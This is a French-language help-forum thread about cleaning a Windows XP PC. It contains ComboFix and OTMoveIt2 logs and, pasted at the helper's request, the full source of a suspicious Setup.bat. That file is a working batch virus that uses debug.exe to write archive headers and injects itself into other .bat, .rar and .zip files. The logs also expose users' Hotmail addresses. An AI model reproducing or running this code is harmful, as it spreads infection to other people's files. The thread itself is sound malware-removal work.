2008-07-03 14:34 . 2008-06-28 14:21 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys
2008-07-03 14:34 . 2008-06-28 14:21 17,144 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-07-03 12:29 . 2008-07-03 12:29 <REP> d-------- C:\WINDOWS\system32\Kaspersky Lab
2008-07-02 09:25 . 2008-07-02 09:25 <REP> d-------- C:\combo-fix
2008-06-30 21:42 . 2008-06-30 21:42 <REP> d--h----- C:\Documents and Settings\All Users\Application Data\CanonBJ
2008-06-30 21:42 . 2006-05-01 12:00 161,792 --a------ C:\WINDOWS\system32\CNMLM86.DLL
2008-06-30 16:05 . 2008-07-01 10:17 <REP> d-------- C:\Lop SD
2008-06-26 21:27 . 2008-06-26 21:27 <REP> d-------- C:\Program Files\Avira
2008-06-26 21:27 . 2008-06-26 21:27 <REP> d-------- C:\Documents and Settings\All Users\Application Data\Avira
2008-06-21 10:52 . 2008-06-26 22:15 <REP> d-------- C:\Muestras
2008-06-21 10:20 . 2004-08-04 00:48 2,150,400 --a------ C:\WINDOWS\system32\ntoskrnl.exe
2008-06-21 10:20 . 2004-08-04 00:48 2,150,400 --a--c--- C:\WINDOWS\system32\dllcache\ntkrnlmp.exe
2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx
2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat
2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx
2008-06-16 16:14 . 2008-06-16 17:19 32 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat
2008-06-16 16:13 . 2008-06-16 16:13 <REP> d-------- C:\kav
2008-06-12 14:07 . 2008-06-12 14:07 <REP> d-------- C:\Program Files\Creative
2008-06-12 14:07 . 2003-01-27 16:32 831,600 --a------ C:\WINDOWS\system32\Ctaa1.dat
2008-06-12 14:07 . 2003-11-11 10:44 333,600 --a------ C:\WINDOWS\system32\drivers\ctdvda2k.sys
2008-06-12 14:07 . 2003-07-14 16:49 122,880 --a------ C:\WINDOWS\system32\cddvdint.dll
2008-06-12 14:07 . 2003-11-11 10:43 77,824 --a------ C:\WINDOWS\system32\ctdvda32.dll
2008-06-08 17:39 . 2004-08-05 14:00 13,463,552 --a--c--- C:\WINDOWS\system32\dllcache\hwxjpn.dll
2008-06-08 17:38 . 2004-08-05 14:00 10,096,640 --a--c--- C:\WINDOWS\system32\dllcache\hwxcht.dll
2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\WindowsShell.Manifest
2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\wuaucpl.cpl.manifest
2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\sapi.cpl.manifest
2008-06-08 17:36 . 2008-06-08 17:36 749 -rah----- C:\WINDOWS\system32\ncpa.cpl.manifest
2008-06-08 17:36 . 2008-06-08 17:36 488 -rah----- C:\WINDOWS\system32\logonui.exe.manifest
2008-06-08 16:57 . 2004-08-05 14:00 168,806 --a--c--- C:\WINDOWS\system32\dllcache\startoc.cat
2008-06-08 16:57 . 2004-08-05 14:00 24,661 --a------ C:\WINDOWS\system32\spxcoins.dll
2008-06-08 16:57 . 2004-08-05 14:00 24,661 --a--c--- C:\WINDOWS\system32\dllcache\spxcoins.dll
2008-06-08 16:57 . 2004-08-05 14:00 19,569 --a--c--- C:\WINDOWS\system32\dllcache\msn7.cat
2008-06-08 16:57 . 2004-08-05 14:00 13,312 --a------ C:\WINDOWS\system32\irclass.dll
2008-06-08 16:57 . 2004-08-05 14:00 13,312 --a--c--- C:\WINDOWS\system32\dllcache\irclass.dll
2008-06-08 16:57 . 2004-08-05 14:00 11,651 --a--c--- C:\WINDOWS\system32\dllcache\msn9.cat
2008-06-08 16:57 . 2004-08-05 14:00 7,407 --a--c--- C:\WINDOWS\system32\dllcache\OEMBIOS.CAT
2008-06-04 13:21 . 2008-06-04 13:21 <REP> d--h----- C:\WINDOWS\PIF

.
(((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-07-04 08:16 --------- d-----w C:\Program Files\OpenOffice.org1.1.4
2008-07-04 08:07 --------- d-----w C:\Documents and Settings\Laura\Application Data\Skype
2008-07-04 08:06 --------- d-----w C:\Program Files\Wanadoo
2008-07-03 19:31 --------- d-----w C:\Program Files\eMule
2008-06-12 12:09 --------- d-----w C:\Program Files\Fichiers communs\InterVideo
2008-06-12 12:08 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-31 19:07 --------- d-----w C:\Program Files\Lame MP3 Codec
2008-05-29 21:18 --------- d---a-w C:\Documents and Settings\All Users\Application Data\TEMP
2008-05-18 13:42 --------- d-----w C:\Documents and Settings\papounet\Application Data\Ulead Systems
2008-05-07 22:35 --------- d-----w C:\Documents and Settings\Laura\Application Data\Ulead Systems
2008-05-07 21:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\InterVideo
2008-05-07 21:12 --------- d-----w C:\Program Files\Fichiers communs\Ulead Systems
2008-05-07 21:11 --------- d-----w C:\Program Files\Ulead Systems
2008-05-07 21:11 --------- d-----w C:\Documents and Settings\All Users\Application Data\Ulead Systems
2008-05-07 20:03 --------- d-----w C:\Program Files\EA GAMES
2008-05-06 12:01 --------- d-----w C:\Program Files\Fichiers communs\Adobe
2007-09-10 16:46 4,537 ----a-w C:\Documents and Settings\Laura\Setup.bat
.

((((((((((((((((((((((((((((((((( Point de chargement Reg )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
REGEDIT4
*Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-05 14:00 15360]
"LogitechSoftwareUpdate"="C:\Program Files\Logitech\Video\ManifestEngine.exe" [2004-06-01 12:46 196608]
"LDM"="C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe" [2007-02-21 14:23 67128]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2006-05-11 17:24 18577448]
"WOOKIT"="C:\PROGRA~1\Wanadoo\GestMaj.exe" [2004-10-14 16:55 32768]
"msnmsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" [2007-10-18 11:34 5724184]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-07 15:14 68856]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2004-10-29 16:50 4620288]
"NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2004-10-29 16:50 86016]
"Easy-PrintToolBox"="C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE" [2004-01-14 03:10 409600]
"MMTray"="C:\Program Files\Musicmatch\Musicmatch Jukebox\mm_tray.exe" [2006-01-17 13:12 135168]
"mmtask"="C:\Program Files\Musicmatch\Musicmatch Jukebox\mmtask.exe" [2006-01-17 13:12 53248]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe" [2005-11-10 13:03 36975]
"WOOWATCH"="C:\PROGRA~1\Wanadoo\Watch.exe" [2004-08-23 14:49 20480]
"WOOTASKBARICON"="C:\PROGRA~1\Wanadoo\GestMaj.exe" [2004-10-14 16:55 32768]
"Device Detector"="C:\Program Files\Fichiers communs\ACD Systems\FR\DevDetect.exe" [2005-06-27 10:21 221184]
"UVS11 Preload"="C:\Program Files\Ulead Systems\Ulead VideoStudio 11\uvPL.exe" [2007-04-12 13:23 341488]
"SMSTray"="C:\Program Files\Samsung\Samsung Media Studio 5\SMSTray.exe" [2007-09-20 08:23 132624]
"avgnt"="C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [2008-02-12 10:06 262401]
"nwiz"="nwiz.exe" [2004-10-29 16:50 921600 C:\WINDOWS\system32\nwiz.exe]
"Raccourci vers la page des propriétés de High Definition Audio"="HDAudPropShortcut.exe" [2004-03-17 16:10 61952 C:\WINDOWS\system32\Hdaudpropshortcut.exe]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2004-08-05 14:00 15360]

C:\Documents and Settings\All Users\Menu D‚marrer\Programmes\D‚marrage\
InterVideo WinCinema Manager.lnk - C:\Program Files\Fichiers communs\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-06-12 14:08:36 184320]
Lancement rapide d'Adobe Reader.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-09-24 08:05:26 29696]
Logitech Desktop Messenger.lnk - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe [2007-02-21 14:23:09 67128]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{88485281-8b4b-4f8d-9ede-82e29a064277}"= "C:\PROGRA~1\MarkAny\CONTEN~1\MACSMA~1.DLL" [2004-11-23 17:51 192512]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.l3acm"= l3codecp.acm
"msacm.enc"= ITIG726.acm
"VIDC.ACDV"= ACDV.dll
"vidc.yv12"= yv12vfw.dll
"msacm.dvacm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\Vio\Dvacm.acm
"msacm.MPEGacm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\MPEG\MPEGacm.acm
"msacm.ulmp3acm"= C:\PROGRA~1\FICHIE~1\ULEADS~1\MPEG\ulmp3acm.acm

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sacsvr]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sglfb.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\tga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpCtr.exe"=
"C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LogitechDesktopMessenger.exe"=
"C:\\Program Files\\iTunes\\iTunes.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

R0 iteraid;ITERAID_Service_Install;C:\WINDOWS\system32\DRIVERS\iteraid.sys [2004-07-16 11:12]
S2 IKANLOADER2;General Purpose USB Driver (e4ldr.sys);C:\WINDOWS\system32\Drivers\e4ldr.sys [2006-03-02 19:25]
S3 cmudax;C-Media High Definition Audio Interface;C:\WINDOWS\system32\drivers\cmudax.sys [2004-10-21 12:56]
S3 e4usbaw;USB ADSL2 WAN Adapter;C:\WINDOWS\system32\DRIVERS\e4usbaw.sys [2006-05-04 18:50]
S3 FirebirdServerMAGIXInstance;Firebird Server - MAGIX Instance;C:\MAGIX\Common\Database\bin\fbserver.exe [2005-11-17 16:18]
S3 PhilCam8116_XP;Logitech QuickCam Pro 3000(PID_08B1);C:\WINDOWS\system32\DRIVERS\CamDrL20.sys [2004-05-21 21:16]
S3 W8100XP;Marvell Libertas 802.11b/g SoftAP Driver for Windows XP ;C:\WINDOWS\system32\DRIVERS\mrv8ka51.sys [2004-05-21 05:47]
S3 WlanUIG;Sagem 802.11g Wireless LAN USB Adapter Driver;C:\WINDOWS\system32\DRIVERS\WlanUIG.sys [2004-09-02 23:18]

*Newly Created Service* - IKANLOADER2
.
Contenu du dossier 'Scheduled Tasks/Tâches planifiées'
"2008-07-03 15:28:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-07-04 08:02:08 C:\WINDOWS\Tasks\Table des caractères.job"
- C:\WINDOWS\system32\charmap.exe
.
- - - - ORPHANS REMOVED - - - -

BHO-{3C8BF6F1-0702-4283-8889-BD3BBBF2FC59} - C:\WINDOWS\system32\hgGATkjk.dll
BHO-{57098e4f-3c41-47b1-97ae-b94ce9ae1aba} - C:\WINDOWS\system32\piiinynd.dll
HKLM-Run-My Web Search Bar Search Scope Monitor - C:\PROGRA~1\MYWEBS~1\bar\2.bin\m3SrchMn.exe
HKLM-Run-Cmaudio - cmicnfg.cpl,CMICtrlWnd


**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-07-04 10:22:43
Windows 5.1.2600 Service Pack 2 NTFS

Balayage processus cachés ...

Balayage caché autostart entries ...

Balayage des fichiers cachés ...

Scan terminé avec succès
Les fichiers cachés: 0

**************************************************************************
.
Temps d'accomplissement: 2008-07-04 10:24:02
ComboFix-quarantined-files.txt 2008-07-04 08:23:27

Pre-Run: 4,980,412,416 octets libres
Post-Run: 5,274,066,944 octets libres

168 --- E O F --- 2008-07-04 08:03:28

Re,

Peux-tu regarder si tu as copié correctement le rapport d'OtMovelt ?
Normalement, il y a Moved Successfuly derrière ou failed to move ..

Peux-tu naviguer manuellement jusqu'à ce fichier : C:\Documents and Settings\Laura\Setup.bat
Ne double clique pas dessus ! Fais un clique droit dessus, puis choisis Modifier.
Un texte va apparaître, copie-le ici. Puis ferme la fenêtre.

Toujours des problèmes ?

En effet je me suis plantée  
Results :
File/Folder C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Télécharger des logiciels.exe not found.
File/Folder C:\Documents and Settings\Guillaume\Application Data\HbTools not found.
< C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat >
File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\alex130392@hotmail.fr\SharingMetadata\infected.dat not found.
< C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat >
File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\guillaume_017@hotmail.fr\SharingMetadata\infected.dat not found.
< C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat >
File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\laura_028@hotmail.fr\SharingMetadata\infected.dat not found.
< C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat >
File/Folder C:\Documents and Settings\Guillaume\Local Settings\Application Data\Microsoft\Messenger\niko0179@hotmail.fr\SharingMetadata\infected.dat not found.

OTMoveIt2 by OldTimer - Version 1.0.4.3 log created on 07042008_135916


Ensuite, le texte qui apparait de "Setup.bat" :

@echo off%mUlq%
cls%mUlq%
if "%1"=="ex" goto mUlqex
if "%1"=="agaq!" goto mUlqb
if "%1"=="agaq_!" goto mUlqr
if "%1"=="agaq_!!" goto mUlqz
if exist c:\mUldrop.bat goto mUlqY
%windir%\system32\find "mUl"<%0>c:\mUldrop.bat%mUlq%
:mUlqex
set tr=mU%mUlq%
set ah=lu%mUlq%
echo.>c:\Extract.bat%mUlq%
%windir%\system32\find "%tr%%ah%"<%0>>c:\Extract.bat%mUlq%
echo n mUlq.t>%windir%\temp\mUlqq
echo e 0100 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00>>%windir%\temp\mUlqq
echo e 0110 00 00 00 00 62 76 74 20 90 30 00 55 02 00 00 55>>%windir%\temp\mUlqq
echo e 0120 02 00 00 02 8F DB 66 39 9D 83 2E 36 14 30 0B 00>>%windir%\temp\mUlqq
echo e 0130 20 00 00 00 45 78 74 72 61 63 74 2E 62 61 74 00>>%windir%\temp\mUlqq
echo e 0140 B0 56 21 83>>%windir%\temp\mUlqq
echo rcx>>%windir%\temp\mUlqq
echo 44>>%windir%\temp\mUlqq
echo.>>%windir%\temp\mUlqq
echo.>>%windir%\temp\mUlqq
echo w>>%windir%\temp\mUlqq
echo.>>%windir%\temp\mUlqq
echo.>>%windir%\temp\mUlqq
echo q>>%windir%\temp\mUlqq
%windir%/system32/debug < %windir%\temp\mUlqq>nul
echo n mUlq2.t>%windir%\temp\mUlq2
echo e 0100 C4 3D 7B 00 40 07 00 0D 0A 0D 0A>>%windir%\temp\mUlq2
echo rcx>>%windir%\temp\mUlq2
echo b>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo w>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo q>>%windir%\temp\mUlq2
%windir%/system32/debug < %windir%\temp\mUlq2>nul
type mUlq.t>c:\Setup.rar
type c:\Extract.bat>>c:\Setup.rar%mUlq%
type mUlq2.t>>c:\Setup.rar
echo n mUlq.t>%windir%\temp\mUlq
echo e 0100 50 4B 03 04 0A 00 00 00 00 00 9D 83 2E 36 8F DB>>%windir%\temp\mUlq
echo e 0110 66 39 55 02 00 00 55 02 00 00 0B 00 00 00 45 78>>%windir%\temp\mUlq
echo e 0120 74 72 61 63 74 2E 62 61 74>>%windir%\temp\mUlq
echo rcx>>%windir%\temp\mUlq
echo 29>>%windir%\temp\mUlq
echo.>>%windir%\temp\mUlq
echo.>>%windir%\temp\mUlq
echo w>>%windir%\temp\mUlq
echo.>>%windir%\temp\mUlq
echo.>>%windir%\temp\mUlq
echo q>>%windir%\temp\mUlq
%windir%/system32/debug < %windir%\temp\mUlq>nul
echo n mUlq2.t>%windir%\temp\mUlq2
echo e 0100 50 4B 01 02 14 00 0A 00 00 00 00 00 9D 83 2E 36>>%windir%\temp\mUlq2
echo e 0110 8F DB 66 39 55 02 00 00 55 02 00 00 0B 00 00 00>>%windir%\temp\mUlq2
echo e 0120 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 78>>%windir%\temp\mUlq2
echo e 0130 74 72 61 63 74 2E 62 61 74 50 4B 05 06 00 00 00>>%windir%\temp\mUlq2
echo e 0140 00 01 00 01 00 39 00 00 00 7E 02 00 00 00 00 0D>>%windir%\temp\mUlq2
echo e 0150 0A>>%windir%\temp\mUlq2
echo rcx>>%windir%\temp\mUlq2
echo 51>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo w>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo.>>%windir%\temp\mUlq2
echo q>>%windir%\temp\mUlq2
%windir%/system32/debug < %windir%\temp\mUlq2>nul
type mUlq.t>c:\Install.zip
type c:\Extract.bat>>c:\Install.zip%mUlq%
type mUlq2.t>>c:\Install.zip
:mUlqY
set xmUlq=for
set zmUlq=call
%xmUlq% %%a in (*.bat ..\*.bat) do %zmUlq% c:\mUldrop.bat agaq! "%%a"
%xmUlq% %%a in (*.rar ..\*.rar) do %zmUlq% c:\mUldrop.bat agaq_! "%%a"
%xmUlq% %%a in (*.zip ..\*.zip) do %zmUlq% c:\mUldrop.bat agaq_!! "%%a"
if exist mUlq*.t del mUlq*.t
if exist mUlqb del mUlqb
if exist mUlqr del mUlqr
if exist mUlqz del mUlqz
if exist mUlqm del mUlqm
goto mUlqend
:mUlqb
%windir%\system32\find "mUl"<%2>nul%mUlq%
if not errorlevel 1 goto mUlqend
type c:\mUldrop.bat>mUlqb
echo.>>mUlqb
type %2>>mUlqb
copy mUlqb %2
goto mUlqend
:mUlqr
%windir%\system32\find "mUlq"<%2>nul
if not errorlevel 1 goto mUlqend
type c:\setup.rar>mUlqr
type %2>>mUlqr
%windir%\system32\find "mUlq"<c:\mUldrop.bat>>mUlqr
copy mUlqr %2
goto mUlqend
:mUlqz
%windir%\system32\find "mUlq"<%2>nul
if not errorlevel 1 goto mUlqend
type c:\Install.zip>mUlqz
type %2>>mUlqz
%windir%\system32\find "mUlq"<c:\mUldrop.bat>>mUlqz
copy mUlqz %2
goto mUlqend
:mUlqend
set aaa=bbb%mUlq%
@echo off%mUlu%
cls>nul%mUlu%
if bbb==%aaa% goto mUluz
if "%1"=="mUlu!" goto mUlu1
if exist c:\mUldrop.bat goto mUlue
for %%a in (*.rar,*.zip ..\*.rar ..\*.zip) do call %0 mUlu! "%%a"
goto mUlue
:mUlu1
if ddd==%ccc% goto mUluz
set tr=mU%mUlu%
set ah=lq%mUlu%
%windir%\system32\find "mUldrop"<%2>nul%mUlu%
if errorlevel 1 goto mUluz%mUlu%
%windir%\system32\find "%tr%%ah%"<%2>c:\mUldrop.bat%mUlu%
%windir%\system32\find "mUlu"<%2>>c:\mUldrop.bat
set ccc=ddd%mUlu%
goto mUluz
:mUlue
if exist setup.bat goto mUluz
copy c:\mUldrop.bat Setup.bat%mUlu%
Setup.bat ex%mUlu%
:mUluz

Et plus de problèmes   Mon ordinateur ne bug plus, la barre démarrer ne s'en va plus, je ne suis plus obligée de passer par tout un bazar pour ouvrir une page du net, et certains logiciels qui plantaient ( photo, vidéo... ) marchent à merveille ! Enfin je ne sais pas si c'est en rapport, mais c'est toujours bon à prendre  
Merci beaucoup !!!
Il reste des choses à vérifier ?

Tu avais trois infections  
N'hésite pas à revenir si tu rencontre des soucis ^^

J'aimerais que tu fasses ce dernier scan, pour le .bat potentiellement dangereux par mes recherches.
Voir ce tuto   => http://forum.pcastuces.com/sujet.asp?f=25&s=31584&page=...